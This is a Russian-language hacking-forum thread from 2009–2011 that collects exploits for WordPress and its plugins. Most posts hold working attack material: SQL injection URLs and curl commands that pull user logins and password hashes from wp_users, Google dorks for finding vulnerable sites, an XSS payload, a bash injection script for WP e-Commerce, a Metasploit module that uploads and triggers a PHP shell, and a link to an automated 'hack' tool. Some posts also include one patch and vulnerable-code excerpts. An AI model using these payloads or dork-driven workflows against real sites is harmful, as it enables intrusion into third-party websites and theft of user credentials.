1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости WordPress

Тема в разделе "Уязвимости популярных CMS", создана пользователем onthar, 21 окт 2009.

  1. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Свежая уязвимость в Wordpress которая позволяет провести DOS атаку на блог жертвы используя файл wp-trackback.php

    Для исправления этой уязвимости необходимо добавить следующий код в файл functions.php, который находится в папке шаблона блога:
    Код:
    function ft_stop_trackback_dos_attacks(){
     global $pagenow;
     if ( 'wp-trackback.php' == $pagenow ){
     // DoS attack fix.
     if ( isset($_POST['charset']) ){
     $charset = $_POST['charset'];
     if ( strlen($charset) > 50 ) { die; }
     }
     }
    }
    add_action('init','ft_stop_trackback_dos_attacks');
    Если у вас нет возможности или знаний, для того, чтобы прописать данный код в вашем блоге, скачайте и установите плагин который исправляет эту уязвимость.

    Эксплоит уязвимости: jarraltech.com/2009/10/new-0-day-wordpress-exploit/
    Источник: blogproblog.com/wp-trackback_dos_attack/

    (c)habrahabr
     
    21 окт 2009
    1 человеку нравится это.
  2. lytgeygen
    lytgeygen pacifiste maniaque Новичок
    Симпатии:
    112
    WordPress Twitter Feed Plugin 0.x

    Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "url" сценарием wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Эксплоит:

    http://localhost/wordpress/wp-conte...agpie_debug.php?url=<script>alert(0)</script>

    Добавлено через 11 минут
    WordPress 3.0.1

    Описание: уязвимость инжекции SQL в do_trackbacks () функция WordPress позволяет удаленным атакующим выполнять произвольный ИЗБРАННЫЙ SQL-запрос.

    Вектор доступа: Сеть
    Сложность атаки: Носитель
    Аутентификация: Единственный Экземпляр
    Воздействие конфиденциальности: Частичный
    Воздействие целостности: Ничего
    Воздействие доступности: Ничего

    Подробная информация
     
    Последнее редактирование: 7 янв 2011
    7 янв 2011
  3. lytgeygen
    lytgeygen pacifiste maniaque Новичок
    Симпатии:
    112
    SQL-inj WordPress до версии 3.0.1 (нужны права Author)

    Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
    Access Vector: Network
    Attack Complexity: Medium
    Authentication: Single Instance
    Confidentiality Impact: Partial
    Integrity Impact: None
    Availability Impact: None

    [+] сплоит

    [свернуть]
     
    28 янв 2011
  4. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    0day уязвимость в темах WordPress

    Утилита для ресайза изображений timthumb.php, поставляемая со многими темами WordPress, уязвима к загрузке произвольного PHP-кода. Поиск Google говорит о наличии 39 миллионов таких скриптов в Сети.

    Утилита недостаточно проверяет передаваемые параметры, в результате чего у злоумышленников появляется возможность загрузить произвольный скрипт в директорию на сервере.

    В конфигурационном файле для скрипта определены домены, с которых ему разрешено получать изображения:

    Код:
     $allowedSites = array (
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
    'photobucket.com',
    ); 
    Однако ошибка в коде проверки допускает загрузку с произвольных сайтов, лишь содержащих такие поддомены четвертого или больше уровней. Например:
    Код:
    blogger.com.somebadhackersite.com/badscript.php
    источник
    xakep.ru/post/56374/

    дорк, inurl:"/timthumb.php?src="
     
    2 авг 2011
  5. TDI
    TDI Новичок
    Симпатии:
    38
    Тип: SQL-Inj

    Плагин:WP-FacebookConnect

    Dork: inurl:"fbconnect_action=myhome"

    Собственно PoC:

    http://www.****.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(u ser_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+fr om+wp_users--
    или
    http://****.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(u ser_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+fr om+wp_users--



    программа для автоматизации процесса:
    [​IMG]
    [​IMG]

    Мечта всех! Кнопка "Взломать" теперь работает*xD*

    Инструкция:
    Находим уязвимые сайт и вводим в прогу без http:// и без слешов(/)
    Типа binaries.ru и получаем логин:пасс в Result
    Скачать: http://rghost.ru/14736221

    Автор: Kuteke

    с античата
     
    15 авг 2011
  6. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress VideoWhisper Video Presentation plugin <= 1.1 SQL Injection Vulnerability

    # Date: 2011-09-01
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/search-autocomplete.zip
    # Version: 1.0.8 (tested)
    # Note: magic_quotes has to be turned off

    ---
    PoC
    ---
    Код:
    http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20
    ---------------
    Vulnerable code
    ---------------
    Код:
    if ($_GET['term'] != '') {
    ...
    $titles = $wpdb->get_results("SELECT post_title As name, ID as post_id, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and post_title LIKE '%".$_GET['term']."%' ORDER BY post_title");

    источник: exploit-db.com​
     
    2 сен 2011
    1 человеку нравится это.
  7. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability


    # Exploit Title: WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability
    # Date: 2011-09-01
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/search-autocomplete.zip
    # Version: 1.0.8 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Код:
    http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20
    Vulnerable code

    Код:
    if ($_GET['term'] != '') {
    ...
    $titles = $wpdb->get_results("SELECT post_title As name, ID as post_id, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and post_title LIKE '%".$_GET['term']."%' ORDER BY post_title");

    WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 SQL Injection Vulnerability

    # Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 SQL Injection Vulnerability
    # Date: 2011-09-03
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/facebook-opengraph-meta-plugin.zip
    # Version: 1.0 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Код:
    http://www.site.com/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1') UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20&page=1&rows=1

    Vulnerable code

    Код:
    $page = $_GET['page']; // get the requested page
    $limit = $_GET['rows']; // get how many rows we want to have into the grid
    ...
    if(isset($_REQUEST["pst_title"]))
    $pst_title = $_REQUEST['pst_title'];
    ...
    if($pst_title!=''){
    $where.= " AND (wposts.post_title LIKE '%$pst_title%'";
    $where.= " OR wpostmeta.meta_value LIKE '%$pst_title%')";
    }
    
    $result = $wpdb->get_var("SELECT COUNT(*) AS count FROM $wpdb->postmeta WHERE meta_key = '_OgMeta'");
    $count = $result['count'];
    if( $count >0 )
    {
    $total_pages = ceil($count/$limit);
    }
    else
    {
    $total_pages = 0;
    }
    if ($page > $total_pages)
    $page=$total_pages; $start = $limit*$page - $limit;
    ...
    $querystr = "
    SELECT wposts.*
    FROM $wpdb->posts wposts, $wpdb->postmeta wpostmeta
    WHERE wposts.ID = wpostmeta.post_id
    AND wpostmeta.meta_key = '_OgMeta'
    AND wposts.post_status = 'publish'
    AND (wposts.post_type = 'post' OR wposts.post_type = 'page')".$where.
    "ORDER BY wposts.post_date DESC
    LIMIT $start , $limit
    ";
    
    $result = $wpdb->get_results($querystr);//, OBJECT);
    WordPress Zotpress plugin <= 4.4 SQL Injection Vulnerability

    # Exploit Title: WordPress Zotpress plugin <= 4.4 SQL Injection Vulnerability
    # Date: 2011-09-04
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/zotpress.4.4.zip
    # Version: 4.4 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Код:
    http://www.site.com/wp-content/plugins/zotpress/zotpress.rss.php?api_user_id=1&account_type=test&displayImages=true&displayImageByCitationID=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23

    Vulnerable code

    Код:
    if ($mzr_api_user_id == false
    && $mzr_include == false
    && (isset($_GET['api_user_id']) && preg_match("/^[0-9]+$/", $_GET['api_user_id'])))
    {
    $mzr_api_user_id = trim($_GET['api_user_id']);
    }
    ...
    if ($mzr_account_type == false
    && $mzr_include == false
    && (isset($_GET['account_type']) && preg_match("/^[a-zA-Z]+$/", $_GET['account_type'])))
    {
    $mzr_account_type = trim($_GET['account_type']);
    }
    ...
    if ($mzr_displayImages == false
    && $mzr_include == false
    && (isset($_GET['displayImages']) && preg_match("/^[a-zA-Z]+$/", $_GET['displayImages'])))
    {
    $zp_update_db_shortcode_request .= "image='".$_GET['displayImages']."', ";
    
    if ($_GET['displayImages'] == "true")
    $mzr_displayImages = true;
    else
    $mzr_displayImages = false;
    }
    ...
    if (isset($mzr_account_type) && isset($mzr_api_user_id))
    {
    if ($mzr_displayImages == true)
    {
    if (isset($_GET['displayImageByCitationID']))
    $images = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."zotpress_images WHERE citation_id='".trim($_GET['displayImageByCitationID'])."'");
    WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability

    # Exploit Title: WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability
    # Date: 2011-09-05
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/oqey-gallery.0.4.8.zip
    # Version: 0.4.8 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Код:
    http://www.site.com/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0' UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23

    Vulnerable code

    Код:
    if(isset($_REQUEST['gal_id'])){
    ...
    $data = explode("-", $_REQUEST['gal_id']);
    $id = $data[0];
    ...
    $s = $wpdb->get_row("SELECT * FROM $oqey_galls WHERE id ='".$id."' ");
    WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability

    # Exploit Title: WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection
    Vulnerability
    # Date: 2011-09-05
    # Author: sherl0ck_ < sherl0ck_ [at] alligatorteam [dot] org >
    # Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip
    # Version: 3.2.5 (tested)


    PoC (POST data)

    URL:
    http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

    POST Data:
    Код:
    delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT
    USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
    wp_users#&setFilter=Filter&s=hello&chkbx=1
    e.g.:
    Код:
    curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION
    ALL SELECT
    USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
    wp_users#&setFilter=Filter&s=hello&chkbx=1"
    http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts


    Vulnerable code

    Код:
    70 if(isset($_POST["setFilter"]))
    71 {
    72 if($_POST["cat"] != 0)
    73 {
    74 $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM
    ".$wpdb->prefix."term_relationships AS tr INNER JOIN
    ".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter
    m_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" .
    $_POST["cat"] . ")";
    75 $cat_filter = $_POST["cat"];
    WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability

    # Exploit Title: WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability
    # Date: 2011-09-06
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/post-highlights.2.2.zip
    # Version: 2.2 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Код:
    http://www.site.com/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1' OR 1=1--%20

    Vulnerable code

    Код:
    $id = $_GET["id"];
    ...
    $query = "SELECT guid, ID FROM $wpdb->posts WHERE post_type='attachment' AND post_parent='$id'";
    WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability

    # Exploit Title: WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability
    # Date: 2011-09-06
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/knr-author-list-widget.zip
    # Version: 2.0.0 (tested)


    PoC

    Код:
    http://www.site.com/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

    Vulnerable code

    Код:
    foreach ($_GET['listItem'] as $position => $item) :
    $iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item";
    $wpdb->query($iterSql);
    endforeach;
    WordPress SCORM Cloud plugin <= 1.0.6.6 SQL Injection Vulnerability

    # Exploit Title: WordPress SCORM Cloud plugin <= 1.0.6.6 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/scormcloud.1.0.6.6.zip
    # Version: 1.0.6.6 (tested)
    # Note: magic_quotes has to be turned off


    PoC (POST data)

    http://www.site.com/wp-content/plugins/scormcloud/ajax.php
    action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20


    e.g.:
    Код:
    curl --data "action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " http://www.site.com/wp-content/plugins/scormcloud/ajax.php

    Vulnerable code

    Код:
    $action = $_POST['action'];
    
    switch($action)
    {
    ...
    $inviteId = $_POST['inviteid'];
    $querystr = "SELECT * FROM ".scormcloud_getDBPrefix()."scormcloudinvitations WHERE invite_id = '$inviteId'";
    $invites = $wpdb->get_results($querystr, OBJECT);
    WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability

    # Exploit Title: WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/eventify.zip
    # Version: 1.7.f (tested)
    # Note: magic_quotes has to be turned off


    PoC (POST data)

    Код:
    http://www.site.com/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
    npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9--%20
    e.g.:
    Код:
    curl --data "npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9-- " http://www.site.com/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php

    Vulnerable code

    Код:
    require_once(str_ireplace("/wp-content","",$_POST['npath']).'/wp-load.php');
    $eventid = $_POST['eventid'];
    $action = "fetch";
    
    if($action=="fetch"){
    ...
    $qry= "select * from ".$table_name." where em_id='$eventid'" ;
    ...
    $results = $wpdb->get_results($qry);
    Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)

    # Exploit Title: 1 Flash Gallery Wordpress Plugin Arbitrary File Upload Exploit
    # # Google Dork: inurl:"wp-content/plugins/1-flash-gallery"
    # # Date: 09/06/2011
    # # Author: Ben Schmidt
    # # Software Link: http://downloads.wordpress.org/plugin/1-flash-gallery.1.5.6.zip
    # # Version: v1.30 to v1.5.7a (tested on 1.5.6 and 1.5.7 prior to patch)

    Код:
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
    
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => '1 Flash Gallery Wordpress Plugin File Upload Exploit',
    'Description' => %q{
    This module exploits an arbitrary file upload vulnerability in
    the '1 Flash Gallery' Wordpress plugin.
    },
    'Author' => [ 'Ben Schmidt'],
    'License' => MSF_LICENSE,
    'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
    'Privileged' => false,
    'Payload' =>
    {
    'DisableNops' => true,
    # Arbitrary big number. The payload gets sent as an HTTP
    # POST request, so it's possible this might be smaller (maybe?)
    # but very unlikely.
    'Space' => 262144, # 256k
    },
    'Platform' => 'php',
    'Arch' => ARCH_PHP,
    'Targets' => [[ 'Automatic', { }]],
    'DefaultTarget' => 0,
    'DisclosureDate' => 'Sept 6, 2011'
    ))
    
    register_options([
    OptString.new('URI', [true, "Path to Wordpress", "/"]),
    ], self.class)
    end
    
    def exploit
    boundary = rand_text_alphanumeric(6)
    fn = rand_text_alphanumeric(8)
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
    data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
    data << payload.encoded
    data << "\r\n--#{boundary}--"
    
    res = send_request_raw({
    'uri'	 => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
    'method' => 'POST',
    'data' => data,
    'headers' =>
    {
    'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
    'Content-Length' => data.length,
    }
    }, 25)
    
    if (res)
    print_status("Successfully uploaded shell.")
    shell_path = res.body.split("_")[0]
    print_status("Trying to access shell at #{shell_path}...")
    res = send_request_raw({
    'uri'	 => datastore['URI'] + shell_path,
    'method' => 'GET',
    }, 0.01)
    
    else
    print_error("Error uploading shell")
    end
    
    handler
    end
    end
    WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability

    # Exploit Title: WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/paid-downloads.2.01.zip
    # Version: 2.01 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Код:
    http://www.site.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
    Vulnerable code

    Код:
    $download_key = $_GET["download_key"];
    $sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '".$download_key."'";
    $link_details = $wpdb->get_row($sql, ARRAY_A);
    WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability

    # Exploit Title: WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/community-events.zip
    # Version: 1.2.1 (tested)


    PoC (POST data)

    Код:
    http://www.site.com/wp-content/plugins/community-events/tracker.php
    id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20
    e.g.:
    Код:
    curl --data "id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))-- " http://www.site.com/wp-content/plugins/community-events/tracker.php
    Vulnerable code

    Код:
    $event_id = $_POST['id'];
    ...
    $ceeventdataquery = "select * from " . $wpdb->get_blog_prefix() . "ce_events where event_id = " . $event_id;
    WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability

    # Exploit Title: WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability
    # Date: 2011-09-09
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/wp-filebase.0.2.9.zip
    # Version: 0.2.9 (tested)

    PoC

    Код:
    http://www.site.com/wp-content/plugins/wp-filebase/wpfb-ajax.php?action=tree&base=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&root=source
    Vulnerable code

    Код:
    if(!isset($_REQUEST['action']))
    die('-1');
    ...
    switch ( $action = $_REQUEST['action'] ) {
    case 'tree':
    ...
    $base_id = (empty($_REQUEST['base']) ? 0 : $_REQUEST['base']);
    ...
    if(empty($_REQUEST['root']) || $_REQUEST['root'] == 'source')
    $parent_id = $base_id;
    else {
    $root = $_REQUEST['root'];
    $parent_id = is_numeric($root) ? intval($root) : intval(substr(strrchr($root,'-'),1));
    }
    ...
    $cats = $browser ? WPFB_Category::GetFileBrowserCats($parent_id) : WPFB_Category::GetCats("WHERE cat_parent = $parent_id ORDER BY cat_name ASC");
    WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerabilit

    # Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
    # Date: 2011-09-09
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
    # Version: 1.3 (tested)
    # Note: magic_quotes has to be turned off

    PoC

    Код:
    http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
    Vulnerable code

    Код:
    $init_letter = $_GET['R'];
    $sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id";
    ...
    $sql_rec = $wpdb->get_results($sql);
    Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability

    # Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability
    # Google Dork: "?regevent_action=register&event_id"
    # Date: 2011-09-09
    # Author: serk
    # Vendor: http://edgetechweb.com/
    # Software Link: https://wordpress.org/extend/plugins/events-registration/
    # Version: 5.44

    [ exploit ]

    Код:
    domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--
    WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability

    # Exploit Title: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability
    # Date: 2011-09-10
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/tune-library.zip
    # Version: 1.5.1 (tested)
    # Notes: magic_quotes has to be turned off
    # Plugin setting "Filter artists by letter and show alphabetical navigation" has to be turned on

    PoC

    Код:
    http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
    Vulnerable code

    Код:
    $artistletter = $_GET['letter'];
    ...
    if ($options['oneletter'] == false || $showallartists == true)
    ...
    else
    {
    if ($artistletter == '#')
    ...
    else
    {
    $querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";
    }
    }
    WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability

    # Exploit Title: WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/forum-server.zip
    # Version: 1.7 (tested)

    PoC (POST data)

    Код:
    http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
    edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&subject=1&content=1&thread_id=1
    e.g.

    Код:
    curl --data "edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&subject=1&content=1&thread_id=1" http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
    Vulnerable code

    Код:
    if(isset($_POST['edit_post_submit'])){
    $subject = $vasthtml->input_filter($_POST['edit_post_subject']);
    $content = $vasthtml->input_filter($_POST['message']);
    $thread = $vasthtml->check_parms($_POST['thread_id']);
    $edit_post_id = $_POST['edit_post_id'];
    ... 
    $sql = ("UPDATE $vasthtml->t_posts SET text = '".stripslashes($content)."', subject = '".stripslashes($subject)."' WHERE id = $edit_post_id");
    $wpdb->query($sql);
    (с) bugsearch
     
    13 сен 2011
    2 пользователям это понравилось.
  8. p0wER
    p0wER Новичок
    Симпатии:
    41
    WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability

    Exploit Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
    Date:
    2011-09-13
    Version: 3.8.6 (tested)

    Код:
    # Exploit Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability# Date: 2011-09-13
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/wp-e-commerce.3.8.6.zip
    # Version: 3.8.6 (tested)
    # Note: parameter $_POST["cs3"] == md5(md5(urldecode($_POST["cs1"])))
    #       it has a "chronopay_salt" option but it's set to '' by default (see more description down below)
     
    ---------------
    PoC (POST data)
    ---------------
    http://www.site.com/?chronopay_callback=true
     cs2=chronopay&cs1=-1  AND  1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill
     
    e.g.
    #!/bin/bash
    payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
    hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
    curl  --data  "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill"  http://www.site.com/?chronopay_callback=true
     
    ---------------
    Vulnerable code
    ---------------
    ./wp-e-commerce/wp-shopping-cart.php:
     
        class WP_eCommerce {
            ...
            function init() {
                ...
                $this->load();
                ...
            }
            function load() {
                ...
                wpsc_core_load_gateways();
                ...
            }
        ...
        $wpec = new WP_eCommerce();
     
     
    ./wp-e-commerce/wpsc-core/wpsc-functions.php:
     
        function wpsc_core_load_gateways() {
            global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
     
            $gateway_directory      = WPSC_FILE_PATH . '/wpsc-merchants';
            $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
     
            $num = 0;
            foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
                if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                    require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
                }
     
     
    ./wp-e-commerce/wpsc-merchants/chronopay.php:
     
        function nzshpcrt_chronopay_callback()
        {
            ...
            if(isset($_GET['chronopay_callback'])  && ($_GET['chronopay_callback'] == 'true') &&  ($_POST['cs2'] == 'chronopay'))
            {
                $salt = get_option('chronopay_salt'); 
                // - this is by default '' and set only if explicitly stated 
                //   inside Store Settings->Payments->General Settings->
                //   Chronopay->Edit->Security Key
                // - problem is that there are more popular payment gateways enlisted (e.g. 
                //   Google Checkout and PayPal) and if that setting is not explicitly set 
                //   it wide opens the door to the potential attacker
     
                $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));    
                 
                if($gen_hash == $_POST['cs3'])
                {
                    ...
                    $sessionid = trim(stripslashes($_POST['cs1']));
                    $transaction_id = trim(stripslashes($_POST['transaction_id']));
                    $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                    $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
     
                    switch($verification_data['trans_type'])
                    {
                        ...
                        case 'rebill':
                            $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET 
                                                `processed` = '2', 
                                                `transactid` = '".$transaction_id."', 
                                                `date` = '".time()."'
                                            WHERE `sessionid` = ".$sessionid." LIMIT 1");
        ...
        add_action('init', 'nzshpcrt_chronopay_callback');
     
    14 сен 2011
  9. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability

    # Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
    # Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
    # Date: 18-09-2011
    # Author: Septemb0x ( CYBER-WARRIOR )
